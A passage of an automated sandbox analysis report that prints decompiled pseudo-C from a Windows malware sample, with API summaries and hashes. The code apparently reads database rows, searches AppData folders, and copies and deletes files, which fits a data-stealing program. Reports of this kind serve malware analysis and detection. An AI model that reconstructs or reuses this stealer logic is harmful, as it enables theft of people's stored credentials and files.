				E004016EF(_a28);
				return E00401562( &_a40);
			}

0x004058b3
0x004058c2
0x004058c5
0x004058ca
0x004058ce
0x004058d4
0x004058d6
0x00405974
0x0040597c
0x00405984
0x0040598c
0x00405994
0x0040599c
0x004059a1
0x004058d8
0x00405909
0x00405911
0x00405919
0x00405921
0x00405926
0x00405926
0x004059a4
0x004059b0
0x004059ba
0x004059d0
0x004059d6
0x004059d9
0x004059db
0x004059e5
0x00405a93
0x00405a96
0x00405a9c
0x00405aa0
0x00000000
0x00000000
0x004059f4
0x004059fb
0x00405a00
0x00405a15
0x00405a1d
0x00405a35
0x00405a3d
0x00405a47
0x00405a4e
0x00405a5e
0x00405a66
0x00405a7e
0x00405a86
0x00405a8e
0x00405a8e
0x00405aa9
0x00405aaf
0x00405ab2
0x00405abd
0x00405abe
0x00405ac9
0x00405ad6
0x00405ade
0x00405adf
0x00405aea
0x00405aea
0x00405af2
0x00405af9
0x00405af9
0x00405b01
0x00405b0a
0x00405b11
0x00405b15
0x00405b1c
0x00405b24
0x00405b2c
0x00405b34
0x00405b45

APIs

Part of subcall function 0040EA50: lstrcpy.KERNEL32(00000000,00000000), ref: 0040EA76

lstrlen.KERNEL32(?), ref: 00405AA9
lstrlen.KERNEL32(?), ref: 00405AB7

Part of subcall function 0040EB6B: lstrlen.KERNEL32(?,?,?,0040D07A,00412124,00000000,00412124,00000000,0040FBE1), ref: 0040EB7F
Part of subcall function 0040EB6B: lstrcpy.KERNEL32(00000000,?), ref: 0040EBA7
Part of subcall function 0040EB6B: lstrcat.KERNEL32(?,00000000), ref: 0040EBB2

Part of subcall function 0040EB29: lstrcpy.KERNEL32(00000000,?), ref: 0040EB57
Part of subcall function 0040EB29: lstrcat.KERNEL32(?,00000000), ref: 0040EB61

Part of subcall function 0040EAEF: lstrcpy.KERNEL32(00000000,?), ref: 0040EB1F

Memory Dump Source

Source File: 00000000.00000002.351171685.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.351171685.000000000041B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.351171685.0000000000422000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.351171685.0000000000427000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.351171685.00000000004E3000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.351171685.00000000005B4000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.351171685.0000000000613000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.351171685.0000000000625000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_B7VbZC8QLf.jbxd

Yara matches

Similarity

API ID: lstrcpy$lstrlen$lstrcat
String ID:
API String ID: 2500673778-0
Opcode ID: ce7af39f0a90a07ff3b2e17a5c377d8115a05ac34401934f49185c987ea13171
Instruction ID: 327f09ffd39cd377baf7bd53102f493f401891d7f0759b94b3bd1c7d3793d415
Opcode Fuzzy Hash: ce7af39f0a90a07ff3b2e17a5c377d8115a05ac34401934f49185c987ea13171
Instruction Fuzzy Hash: 6771B832900019DBCF00FBA6DD828DEB7B6EF04309B65497AF501B71A1DB39BE158B59

Uniqueness

Uniqueness Score: -1.00%

Function 00405B46 Relevance: 2.7, APIs: 2, Instructions: 163
stringCOMMON

Download Yara Rule

C-Code - Quality: 57%

			E00405B46(void* __ecx, void* __eflags, intOrPtr _a4, char _a16, char _a28, char _a40, intOrPtr _a120) {
				char _v8;
				char _v12;
				char _v24;
				char _v36;
				char _v48;
				char _v60;
				char _v72;
				char _v84;
				char _v96;
				void* __ebx;
				void* __edi;
				void* __esi;
				intOrPtr* _t59;
				char _t77;
				void* _t80;
				void* _t93;
				void* _t97;
				void* _t98;
				void* _t109;
				void* _t135;
				void* _t140;
				void* _t142;
				intOrPtr* _t147;
				void* _t167;
				void* _t168;

				_t135 = __ecx;
				_t147 =  &_v36;
				E0040EA50(_t147, __eflags, 0x40fbe1);
				_t173 = _a120;
				_push( *0x613248);
				_t59 = _t147;
				if(_a120 == 0) {
					E0040EAEF(E0040EB6B(E0040EB29(E0040EB6B(E0040EB29(E0040EB6B(E0040EB6B(_t59, _t135,  &_v96, __eflags,  *0x613328), _t135,  &_v84, __eflags, 0x40fbe4), _t135,  &_a28,  &_v24, __eflags), _t135,  &_v48, __eflags, "_"), _t135,  &_a16,  &_v60, __eflags), _t135,  &_v72, __eflags), _t135,  &_v36);
					E004016EF(_v72);
					E004016EF(_v60);
					E004016EF(_v48);
					E004016EF(_v24);
					E004016EF(_v84);
					_t77 = _v96;
				} else {
					E0040EAEF(E0040EB6B(E0040EB29(E0040EB6B(E0040EB6B(_t59, _t135,  &_v72, _t173,  *0x613328), _t135,  &_v60, _t173, 0x40fbe4), _t135,  &_a28,  &_v48, _t173), _t135,  &_v24, _t173), _t135,  &_v36);
					E004016EF(_v24);
					E004016EF(_v48);
					E004016EF(_v60);
					_t77 = _v72;
				}
				E004016EF(_t77);
				_t80 =  *0x6135c0(_a4,  &_v12); // executed
				if(_t80 == 0) {
					_t93 =  *0x61357c(_v12,  *0x613308, 0xffffffff,  &_v8, _t80); // executed
					_t168 = _t167 + 0x14;
					_t175 = _t93;
					if(_t93 == 0) {
						E0040EA50( &_v24, _t175, 0x40fbe1);
						while(1) {
							_t97 =  *0x613598(_v8);
							_pop(_t140);
							if(_t97 != 0x64) {
								break;
							}
							_t98 =  *0x6135b4(_v8, 0);
							_pop(_t142);
							E0040EAEF(E0040EB6B( &_v24, _t142,  &_v96, __eflags, _t98), _t142,  &_v24);
							E004016EF(_v96);
							E0040EAEF(E0040EB6B( &_v24, _t142,  &_v84, __eflags, "\n"), _t142,  &_v24);
							E004016EF(_v84);
						}
						_t109 =  *0x61367c(_v24);
						_t177 = _t109 - 5;
						if(_t109 > 5) {
							_push( *0x61367c(_v24));
							_push(_v24);
							_t169 = _t168 - 0xc;
							E0040EA82( &_v36, _t140, _t168 - 0xc, _t177);
							E00401581( &_a40, _t169 - 0x50);
							_push( &_v96);
							E00403721(_t140, _t177);
							E004016EF(_v96);
						}
						E004016EF(_v24);
						E004016EF(0);
					}
					 *0x61359c(_v8);
					 *0x6135c4(_v12); // executed
				}
				E004016EF(_v36);
				E004016EF(0);
				E004016EF(_a4);
				E004016EF(_a16);
				E004016EF(_a28);
				return E00401562( &_a40);
			}

0x00405b46
0x00405b55
0x00405b58
0x00405b5d
0x00405b61
0x00405b67
0x00405b69
0x00405c07
0x00405c0f
0x00405c17
0x00405c1f
0x00405c27
0x00405c2f
0x00405c34
0x00405b6b
0x00405b9c
0x00405ba4
0x00405bac
0x00405bb4
0x00405bb9
0x00405bb9
0x00405c37
0x00405c43
0x00405c4d
0x00405c63
0x00405c69
0x00405c6c
0x00405c6e
0x00405c78
0x00405cc8
0x00405ccb
0x00405cd1
0x00405cd5
0x00000000
0x00000000
0x00405c84
0x00405c8b
0x00405c9b
0x00405ca3
0x00405cbb
0x00405cc3
0x00405cc3
0x00405cda
0x00405ce0
0x00405ce3
0x00405cee
0x00405cef
0x00405cf5
0x00405cfa
0x00405d07
0x00405d0f
0x00405d10
0x00405d1b
0x00405d1b
0x00405d23
0x00405d2a
0x00405d2a
0x00405d32
0x00405d3b
0x00405d42
0x00405d46
0x00405d4d
0x00405d55
0x00405d5d
0x00405d65
0x00405d76

APIs

Part of subcall function 0040EA50: lstrcpy.KERNEL32(00000000,00000000), ref: 0040EA76

lstrlen.KERNEL32(?,?), ref: 00405CDA
lstrlen.KERNEL32(?), ref: 00405CE8

Part of subcall function 0040EB6B: lstrlen.KERNEL32(?,?,?,0040D07A,00412124,00000000,00412124,00000000,0040FBE1), ref: 0040EB7F
Part of subcall function 0040EB6B: lstrcpy.KERNEL32(00000000,?), ref: 0040EBA7
Part of subcall function 0040EB6B: lstrcat.KERNEL32(?,00000000), ref: 0040EBB2

Part of subcall function 0040EB29: lstrcpy.KERNEL32(00000000,?), ref: 0040EB57
Part of subcall function 0040EB29: lstrcat.KERNEL32(?,00000000), ref: 0040EB61

Part of subcall function 0040EAEF: lstrcpy.KERNEL32(00000000,?), ref: 0040EB1F

Memory Dump Source

Source File: 00000000.00000002.351171685.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.351171685.000000000041B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.351171685.0000000000422000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.351171685.0000000000427000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.351171685.00000000004E3000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.351171685.00000000005B4000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.351171685.0000000000613000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.351171685.0000000000625000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_B7VbZC8QLf.jbxd

Yara matches

Similarity

API ID: lstrcpy$lstrlen$lstrcat
String ID:
API String ID: 2500673778-0
Opcode ID: 85e1d589c319f39d57764bf423778add09578af2b8e6ecd773339016f12b6904
Instruction ID: 976dcf5e75ff84394ce150ad1f0a453341e14e708aca77dc6a0693574c33bcb5
Opcode Fuzzy Hash: 85e1d589c319f39d57764bf423778add09578af2b8e6ecd773339016f12b6904
Instruction Fuzzy Hash: 4751D6329000199BCF00FBA6DD868DD77B6EF04309B554976F501B71B1DB39BE258B58

Uniqueness

Uniqueness Score: -1.00%

Function 0040B72A Relevance: 2.6, APIs: 2, Instructions: 96
stringCOMMON

Download Yara Rule

C-Code - Quality: 62%

			E0040B72A(void* __eflags, char _a4) {
				void* _v8;
				char _v20;
				char _v284;
				void* __ebx;
				void* __edi;
				void* __esi;
				intOrPtr* _t24;
				void* _t71;
				void* _t73;
				void* _t74;
				void* _t75;
				void* _t76;

				_v8 =  &_v284;
				memset(_v8, 0, 0x104 << 0);
				_t24 = E0040D93A( &_v20, 0x1a);
				 *0x61375c();
				E004016EF(_v20);
				 *0x61375c();
				_t73 = _t71 + 0xc - 0x50;
				_t53 =  &_a4;
				E00401581( &_a4, _t73);
				E0040B4FA(0x40fbe1,  &_v284,  *0x613524,  *0x613300,  &_v284); // executed
				_t74 = _t73 + 0x10;
				E00401581( &_a4, _t74);
				E0040B4FA(0x40fbe1,  &_v284,  *0x6131d4,  *0x613300,  *0x61324c); // executed
				_t75 = _t74 + 0x10;
				E00401581(_t53, _t75);
				E0040B4FA(0x40fbe1,  &_v284,  *0x613380,  *0x613300,  &_v284);
				_t76 = _t75 + 0x10;
				E00401581(_t53, _t76);
				E0040B4FA(0x40fbe1,  &_v284,  *0x6132c0,  *0x613300,  *_t24);
				_t77 = _t76 + 0x10;
				E00401581(_t53, _t76 + 0x10);
				_push( *0x613300);
				_push( *0x6133c4);
				_push( &_v284);
				E0040B4FA();
				E00401581(_t53, _t77 + 0x10);
				E0040B4FA(0x40fbe1,  &_v284,  *0x613138,  *0x613300, 0x40fbe1);
				_v8 =  &_v284;
				memset(_v8, 0, 0x104 << 0);
				return E00401562(_t53);
			}

0x0040b73c
0x0040b749
0x0040b750
0x0040b75f
0x0040b768
0x0040b77a
0x0040b780
0x0040b783
0x0040b788
0x0040b7a6
0x0040b7ab
0x0040b7b0
0x0040b7c9
0x0040b7ce
0x0040b7d3
0x0040b7ec
0x0040b7f1
0x0040b7f6
0x0040b80f
0x0040b814
0x0040b819
0x0040b81e
0x0040b82a
0x0040b830
0x0040b832
0x0040b83c
0x0040b855
0x0040b863
0x0040b870
0x0040b87d

APIs

Part of subcall function 0040D93A: SHGetFolderPathA.SHELL32(00000000,?,00000000,00000000,?,0040FBE1,?), ref: 0040D96B

lstrcat.KERNEL32(?,00000000), ref: 0040B75F
lstrcat.KERNEL32(?), ref: 0040B77A

Part of subcall function 0040B4FA: wsprintfA.USER32 ref: 0040B515
Part of subcall function 0040B4FA: FindFirstFileA.KERNEL32(?,?), ref: 0040B52C
Part of subcall function 0040B4FA: StrCmpCA.SHLWAPI(?,0040FBF0), ref: 0040B54A
Part of subcall function 0040B4FA: StrCmpCA.SHLWAPI(?,0040FBF4), ref: 0040B564
Part of subcall function 0040B4FA: wsprintfA.USER32 ref: 0040B589
Part of subcall function 0040B4FA: StrCmpCA.SHLWAPI(0040FBE1,0040FBE1), ref: 0040B59A
Part of subcall function 0040B4FA: wsprintfA.USER32 ref: 0040B5B7
Part of subcall function 0040B4FA: PathMatchSpecA.SHLWAPI(?,?), ref: 0040B5DA
Part of subcall function 0040B4FA: lstrcat.KERNEL32(?), ref: 0040B60A
Part of subcall function 0040B4FA: lstrcat.KERNEL32(?,0040FBE4), ref: 0040B61D
Part of subcall function 0040B4FA: lstrcat.KERNEL32(?,?), ref: 0040B62D
Part of subcall function 0040B4FA: lstrcat.KERNEL32(?,0040FBE4), ref: 0040B63B
Part of subcall function 0040B4FA: lstrcat.KERNEL32(?,?), ref: 0040B64F
Part of subcall function 0040B4FA: CopyFileA.KERNEL32(?,?,00000001), ref: 0040B665

Part of subcall function 0040B4FA: wsprintfA.USER32 ref: 0040B5C7
Part of subcall function 0040B4FA: DeleteFileA.KERNEL32(?), ref: 0040B6CD
Part of subcall function 0040B4FA: FindNextFileA.KERNEL32(?,?), ref: 0040B706
Part of subcall function 0040B4FA: FindClose.KERNEL32(?), ref: 0040B717

Memory Dump Source

Source File: 00000000.00000002.351171685.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.351171685.000000000041B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.351171685.0000000000422000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.351171685.0000000000427000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.351171685.00000000004E3000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.351171685.00000000005B4000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.351171685.0000000000613000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.351171685.0000000000625000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_B7VbZC8QLf.jbxd

Yara matches

Similarity

API ID: lstrcat$Filewsprintf$Find$Path$CloseCopyDeleteFirstFolderMatchNextSpec
String ID:
API String ID: 2104210347-0
Opcode ID: c5c8b9e2b674fcf20a21632d623088857d5a17187d1a68913acddfd9d9042992
Instruction ID: 69f3cf410d22dac907b3ee9c25be955136c12850eaa9065b15ccb15117e9ce4c
Opcode Fuzzy Hash: c5c8b9e2b674fcf20a21632d623088857d5a17187d1a68913acddfd9d9042992
Instruction Fuzzy Hash: 7F31A87280002DBFCF01AB55DC429D9777AEB44304F049467F906B3262DF355B525BD9

Uniqueness

Uniqueness Score: -1.00%

Function 0040C74D Relevance: 2.6, APIs: 2, Instructions: 50
stringCOMMON

Download Yara Rule

C-Code - Quality: 72%

			E0040C74D(void* __eflags, char _a4) {
				void* _v8;
				char _v20;
				char _v284;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* _t45;

				_v8 =  &_v284;
				memset(_v8, 0, 0x104 << 0);
				 *0x61375c( &_v284,  *((intOrPtr*)(E0040D93A( &_v20, 0x1a))));
				E004016EF(_v20);
				 *0x61375c( *0x613088);
				E00401581( &_a4, _t45 + 0xc - 0x50);
				E0040B4FA(0x40fbe1,  &_v284,  *0x6131dc,  *0x613060,  &_v284); // executed
				_v8 =  &_v284;
				memset(_v8, 0, 0x104 << 0);
				return E00401562( &_a4);
			}

0x0040c75f
0x0040c76c
0x0040c782
0x0040c78b
0x0040c79d
0x0040c7ab
0x0040c7c8
0x0040c7d6
0x0040c7e3
0x0040c7f0

APIs

Part of subcall function 0040D93A: SHGetFolderPathA.SHELL32(00000000,?,00000000,00000000,?,0040FBE1,?), ref: 0040D96B

lstrcat.KERNEL32(?,00000000), ref: 0040C782
lstrcat.KERNEL32(?), ref: 0040C79D

Part of subcall function 0040B4FA: wsprintfA.USER32 ref: 0040B515
Part of subcall function 0040B4FA: FindFirstFileA.KERNEL32(?,?), ref: 0040B52C
Part of subcall function 0040B4FA: StrCmpCA.SHLWAPI(?,0040FBF0), ref: 0040B54A
Part of subcall function 0040B4FA: StrCmpCA.SHLWAPI(?,0040FBF4), ref: 0040B564
Part of subcall function 0040B4FA: wsprintfA.USER32 ref: 0040B589
Part of subcall function 0040B4FA: StrCmpCA.SHLWAPI(0040FBE1,0040FBE1), ref: 0040B59A
Part of subcall function 0040B4FA: wsprintfA.USER32 ref: 0040B5B7
Part of subcall function 0040B4FA: PathMatchSpecA.SHLWAPI(?,?), ref: 0040B5DA
Part of subcall function 0040B4FA: lstrcat.KERNEL32(?), ref: 0040B60A
Part of subcall function 0040B4FA: lstrcat.KERNEL32(?,0040FBE4), ref: 0040B61D
Part of subcall function 0040B4FA: lstrcat.KERNEL32(?,?), ref: 0040B62D
Part of subcall function 0040B4FA: lstrcat.KERNEL32(?,0040FBE4), ref: 0040B63B
Part of subcall function 0040B4FA: lstrcat.KERNEL32(?,?), ref: 0040B64F
Part of subcall function 0040B4FA: CopyFileA.KERNEL32(?,?,00000001), ref: 0040B665

Memory Dump Source

Source File: 00000000.00000002.351171685.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.351171685.000000000041B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.351171685.0000000000422000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.351171685.0000000000427000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.351171685.00000000004E3000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.351171685.00000000005B4000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.351171685.0000000000613000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.351171685.0000000000625000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_B7VbZC8QLf.jbxd

Yara matches

Similarity

API ID: lstrcat$wsprintf$FilePath$CopyFindFirstFolderMatchSpec
String ID:
API String ID: 800431183-0
Opcode ID: 6f2ce74d3e568f17f9ecbe176a1f722e8cb0edc839b625f684281ec417889092
Instruction ID: d2171469c3bba4a90f971be3dcb0e0752bf907204bd65e6e01f35ec85a8c1238
Opcode Fuzzy Hash: 6f2ce74d3e568f17f9ecbe176a1f722e8cb0edc839b625f684281ec417889092
Instruction Fuzzy Hash: F211847290011DAFCF04EBA4DC469DD77BAEF44304F1484B6E605E32A1DA35AF859F94

Uniqueness

Uniqueness Score: -1.00%

Function 0040D93A Relevance: 1.5, APIs: 1, Instructions: 28
COMMON

Download Yara Rule

C-Code - Quality: 58%

			E0040D93A(void* __eax, intOrPtr _a4) {
				void* _v8;
				char _v1008;
				void* __esi;
				void* _t20;
				void* _t24;

				_t24 = __eax;
				_v8 =  &_v1008;
				memset(_v8, 0, 0x3e8 << 0);
				 *0x613744(0, _a4, 0, 0,  &_v1008, _t20); // executed
				E0040EA50(_t24, 0,  &_v1008);
				return _t24;
			}

0x0040d944
0x0040d94d
0x0040d95a
0x0040d96b
0x0040d978
0x0040d982

APIs

SHGetFolderPathA.SHELL32(00000000,?,00000000,00000000,?,0040FBE1,?), ref: 0040D96B

Part of subcall function 0040EA50: lstrcpy.KERNEL32(00000000,00000000), ref: 0040EA76

Memory Dump Source

Source File: 00000000.00000002.351171685.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.351171685.000000000041B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.351171685.0000000000422000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.351171685.0000000000427000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.351171685.00000000004E3000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.351171685.00000000005B4000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.351171685.0000000000613000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.351171685.0000000000625000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_B7VbZC8QLf.jbxd

Yara matches

Similarity

API ID: FolderPathlstrcpy
String ID:
API String ID: 1699248803-0
Opcode ID: 3c87c2698899f47b0c09f5f1736642e806b29c6eb86a5dcb7430da6c2765b91c
Instruction ID: d41c5a8d46772caceb2edcf84133ea99eae190ea9ca1d944c327a58eb4f6e4cc
Opcode Fuzzy Hash: 3c87c2698899f47b0c09f5f1736642e806b29c6eb86a5dcb7430da6c2765b91c
Instruction Fuzzy Hash: EFE06DB2A10168ABCB01EAA8CC809DEB7FCDB48200F0055B2A905E3280E5309F014B90

Uniqueness

Uniqueness Score: -1.00%

Function 0040D910 Relevance: 1.5, APIs: 1, Instructions: 19
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E0040D910(CHAR* _a4) {
				signed char _t5;
				void* _t9;

				_t5 = GetFileAttributesA(_a4); // executed
				if(_t5 == 0xffffffff || (_t5 & 0x00000010) != 0) {
					_t9 = 0;
				} else {
					_t9 = 1;
				}
				E004016EF(_a4);
				return _t9;
			}

0x0040d917
0x0040d920
0x0040d92b
0x0040d926
0x0040d928
0x0040d928
0x0040d930
0x0040d939

APIs

GetFileAttributesA.KERNEL32(?,?,?,004088CC,?,?,?), ref: 0040D917

Memory Dump Source

Source File: 00000000.00000002.351171685.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.351171685.000000000041B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.351171685.0000000000422000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.351171685.0000000000427000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.351171685.00000000004E3000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.351171685.00000000005B4000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.351171685.0000000000613000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.351171685.0000000000625000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_B7VbZC8QLf.jbxd

Yara matches

Similarity

API ID: AttributesFile
String ID:
API String ID: 3188754299-0
Opcode ID: 6b60efb4bfd6cc87090a0b5691c47e1bf089eadc96a0b8049c45c4de2d679e73
Instruction ID: 810ac5b10b4d0c68a2fd33a960b1d4ae0978b5976fdaeefec8fa062c9c399931
Opcode Fuzzy Hash: 6b60efb4bfd6cc87090a0b5691c47e1bf089eadc96a0b8049c45c4de2d679e73
Instruction Fuzzy Hash: 7CD05E72A0013867CB102AEADC444BABB8ACA027B87105332F959A22E0C6359C6783C4

Uniqueness

Uniqueness Score: -1.00%

Function 00404A31 Relevance: 1.3, APIs: 1, Instructions: 74
COMMON

Download Yara Rule

C-Code - Quality: 95%

			E00404A31(void* __ebx, void* __edx, void* __edi, void* __eflags, char _a4, void* _a8) {
				char _v8;
				void* _v12;
				char _v16;
				void* _t16;
				char _t17;

				_v8 = malloc(0x20);
				_v16 = _a4;
				_t44 = _a8;
				_v12 = _a8;
				_t16 = E0040480F(__ebx, _a8,  &_v16, _t14); // executed
				if(_t16 == 0) {
					_t17 = _v8;
					if(_t17 == 0) {
						goto L2;
					} else {
						_push(__ebx);
						_t41 =  *((intOrPtr*)(_t17 + 8));
						_t53 =  *((intOrPtr*)(_t17 + 0x14));
						 *0x6135c0 = E004049AA( *((intOrPtr*)(_t17 + 0x14)),  *((intOrPtr*)(_t17 + 8)), _t44,  *0x613378);
						 *0x61357c = E004049AA( *((intOrPtr*)(_t17 + 0x14)),  *((intOrPtr*)(_t17 + 8)), _t44,  *0x6130a0);
						 *0x613598 = E004049AA(_t53,  *((intOrPtr*)(_t17 + 8)), _t44,  *0x61330c);
						 *0x6135b4 = E004049AA(_t53, _t41, _t44,  *0x6132f8);
						 *0x61359c = E004049AA(_t53, _t41, _t44,  *0x61331c);
						 *0x6135c4 = E004049AA(_t53, _t41, _t44,  *0x613488);
						 *0x6135a4 = E004049AA(_t53, _t41, _t44,  *0x6133d8);
						 *0x6135ac = E004049AA(_t53, _t41, _t44,  *0x6134d0);
						return 1;
					}
				} else {
					_v12 =  &_v8;
					memset(_v12, 0, 4 << 0);
					L2:
					return 0;
				}
			}

0x00404a43
0x00404a46
0x00404a49
0x00404a50
0x00404a53
0x00404a5d
0x00404a77
0x00404a7c
0x00000000
0x00404a7e
0x00404a7e
0x00404a7f
0x00404a83
0x00404a99
0x00404aab
0x00404abd
0x00404acf
0x00404ae1
0x00404af3
0x00404b05
0x00404b14
0x00404b1f
0x00404b1f
0x00404a5f
0x00404a63
0x00404a70
0x00404a73
0x00404a76
0x00404a76

APIs

malloc.MSVCRT ref: 00404A39

Memory Dump Source

Source File: 00000000.00000002.351171685.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.351171685.000000000041B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.351171685.0000000000422000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.351171685.0000000000427000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.351171685.00000000004E3000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.351171685.00000000005B4000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.351171685.0000000000613000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.351171685.0000000000625000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_B7VbZC8QLf.jbxd

Yara matches

Similarity

API ID: malloc
String ID:
API String ID: 2803490479-0
Opcode ID: 61d4f0cee7c5cecba1a836e5d1c346d5486ddeeb9a2c996298a060c397f47b16
Instruction ID: c44ed323966f1c88828282d661aa14e167a3c4bbf8baad993388b39a89413b6e
Opcode Fuzzy Hash: 61d4f0cee7c5cecba1a836e5d1c346d5486ddeeb9a2c996298a060c397f47b16
Instruction Fuzzy Hash: 842131F5A00624AFCB01EF79EC0158A7BE6BB48714B04907BE50AE33A1D7388710DF99

Uniqueness

Uniqueness Score: -1.00%

Non-executed Functions

Function 0040B1A3 Relevance: 29.9, APIs: 15, Strings: 2, Instructions: 131
filestringmemoryCOMMON

Download Yara Rule

C-Code - Quality: 38%

			E0040B1A3(void* __ecx, intOrPtr _a4, char _a8) {
				char _v12;
				CHAR* _v16;
				char _v28;
				char _v296;
				struct _WIN32_FIND_DATAA _v616;
				char _v880;
				char _v1144;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* _t63;
				void* _t82;
				void* _t94;
				void* _t113;
				void* _t116;
				void* _t117;
				void* _t118;
				void* _t122;
				void* _t123;

				_t94 = __ecx;
				_v12 = RtlAllocateHeap(GetProcessHeap(), 0, 0x98967f);
				wsprintfA( &_v880, "%s\\*", _a4);
				_t117 = _t116 + 0xc;
				_t113 = FindFirstFileA( &_v880,  &_v616);
				if(_t113 == 0xffffffff) {
					L8:
					return E00401562( &_a8);
				} else {
					goto L1;
				}
				do {
					L1:
					_push(0x40fbf0);
					_push( &(_v616.cFileName));
					if( *0x613784() != 0) {
						_t82 =  *0x613784( &(_v616.cFileName), 0x40fbf4);
						_t126 = _t82;
						if(_t82 != 0) {
							wsprintfA( &_v1144, "%s\\%s", _a4,  &(_v616.cFileName));
							_t117 = _t117 + 0x10;
							CopyFileA( &_v1144,  &(_v616.cFileName), 1);
							E0040AF7A(_t94, _t126,  &(_v616.cFileName), _v12);
							_pop(_t94);
							DeleteFileA( &(_v616.cFileName));
						}
					}
				} while (FindNextFileA(_t113,  &_v616) != 0);
				FindClose(_t113);
				_v16 =  &_v296;
				memset(_v16, 0, 0x104 << 0);
				_t118 = _t117 + 0xc;
				 *0x61375c( &_v296,  *0x613454);
				 *0x61375c( &_v296,  *0x613180);
				_t63 =  *0x61367c(_v12);
				_t128 = _t63;
				if(_t63 > 0) {
					_push( *0x61367c(_v12));
					_push(_v12);
					_t122 = _t118 - 0xc;
					E0040EA50(_t122, _t128,  &_v296);
					_t123 = _t122 - 0x50;
					E00401581( &_a8, _t123);
					_push( &_v28);
					E00403721(0, _t128);
					_t118 = _t123 + 0x68;
					E004016EF(_v28);
				}
				_v16 =  &_v296;
				memset(_v16, 0, 0x104 << 0);
				_v16 =  &_v880;
				memset(_v16, 0, 0x104 << 0);
				_v16 =  &_v12;
				memset(_v16, 0, 4 << 0);
				goto L8;
			}

0x0040b1a3
0x0040b1c6
0x0040b1d5
0x0040b1db
0x0040b1f2
0x0040b1f7
0x0040b35c
0x0040b368
0x00000000
0x00000000
0x00000000
0x0040b1fd
0x0040b1fd
0x0040b1fd
0x0040b208
0x0040b211
0x0040b21f
0x0040b225
0x0040b227
0x0040b23f
0x0040b245
0x0040b258
0x0040b268
0x0040b26e
0x0040b276
0x0040b276
0x0040b227
0x0040b28a
0x0040b293
